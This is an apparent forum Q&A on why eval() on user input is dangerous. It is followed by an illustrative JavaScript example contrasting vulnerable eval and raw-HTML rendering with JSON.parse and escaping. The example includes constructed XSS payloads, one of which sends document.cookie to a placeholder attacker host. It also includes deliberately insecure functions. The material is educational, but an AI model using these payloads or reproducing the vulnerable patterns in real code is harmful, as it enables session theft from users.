I read about the security implications of eval(); however, there is something I don't get. Imagine a worst-case scenario where eval() is compiling an input box. A hacker could type anything into it and it would get run, but in modern browsers (e.g. Chrome) couldn't he do exactly the same from the console anyway?
Sure, but the user’s goal is not to steal his own data.
The danger is that someone else succeeds in bringing the malicious code somewhere he knows an eval will occur on the user's page.
An attack exploiting such an issue is called Cross-Site Scripting.
Another similar security issue is directly appending HTML which might contain a script tag. For example, if you do that while implementing a forum, and the users are allowed to write HTML without any restrictions, they can have script tags executing in other users' pages.
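To make both points of the answer concrete, here is an added example (it is not part of the question or the answer above) in JavaScript that runs under Node. The first half feeds an attacker-controlled "settings" string to eval() and to JSON.parse() side by side; the second half renders a forum post by raw concatenation and by HTML-escaping. The function names, the payloads, and the attacker URL are all constructed for illustration.

```javascript
// Added example, not from the original question or answer.
// (1) eval() on text that did not come from the current user lets someone else
//     run code in that user's page; JSON.parse() only ever yields data.
// (2) Concatenating raw HTML from other users is the same problem in disguise:
//     a <script> in a forum post runs in every reader's browser.

// --- 1. eval() versus JSON.parse() on a "settings" string --------------------

// Vulnerable (constructed): treats a serialized settings string (say, from the
// URL fragment or a stored profile field) as code.
function loadSettingsUnsafe(serialized) {
  return eval("(" + serialized + ")");
}

// Hardened: JSON.parse() produces data only and throws on anything that is
// not JSON, so an expression can never be smuggled in.
function loadSettingsSafe(serialized) {
  return JSON.parse(serialized);
}

// Constructed attacker payload: looks like a settings object, but the second
// value is a comma expression whose first part runs attacker code. Setting a
// marker on globalThis stands in for "send document.cookie to the attacker".
const MALICIOUS_SETTINGS =
  '{"theme":"dark","fontSize":(globalThis.__pwned = "cookie stolen", 14)}';

// Runs both loaders on the payload and reports what happened.
function demoEval() {
  delete globalThis.__pwned;
  const unsafe = loadSettingsUnsafe(MALICIOUS_SETTINGS); // attacker code ran
  const sideEffect = globalThis.__pwned;                  // "cookie stolen"
  let safeError = null;
  try {
    loadSettingsSafe(MALICIOUS_SETTINGS);                 // rejected as non-JSON
  } catch (e) {
    safeError = e.name;                                   // "SyntaxError"
  }
  return { unsafeFontSize: unsafe.fontSize, sideEffect, safeError };
}

// --- 2. Raw HTML versus escaped HTML for a forum post ------------------------

// Vulnerable (constructed): the post body goes straight into the markup.
function renderPostUnsafe(author, body) {
  return '<div class="post"><b>' + author + "</b>: " + body + "</div>";
}

// Hardened: replace every character HTML treats specially with its entity so
// the browser renders the post as text. In a real page, assigning the body to
// element.textContent achieves the same without hand-rolled escaping.
function escapeHtml(str) {
  const entities = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  };
  return String(str).replace(/[&<>"']/g, (c) => entities[c]);
}

function renderPostSafe(author, body) {
  return (
    '<div class="post"><b>' + escapeHtml(author) + "</b>: " +
    escapeHtml(body) + "</div>"
  );
}

// Constructed malicious post; the host name is a placeholder.
const MALICIOUS_POST =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// Crude stand-in for "the browser would parse a script element here".
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demoEval());
  console.log(containsScriptTag(renderPostUnsafe("mallory", MALICIOUS_POST)));
  console.log(containsScriptTag(renderPostSafe("mallory", MALICIOUS_POST)));
}
```

The point of running both halves together is that they are the same bug: in each case a string that the current user did not write ends up being interpreted as code in that user's page, which is exactly what the console argument in the question overlooks.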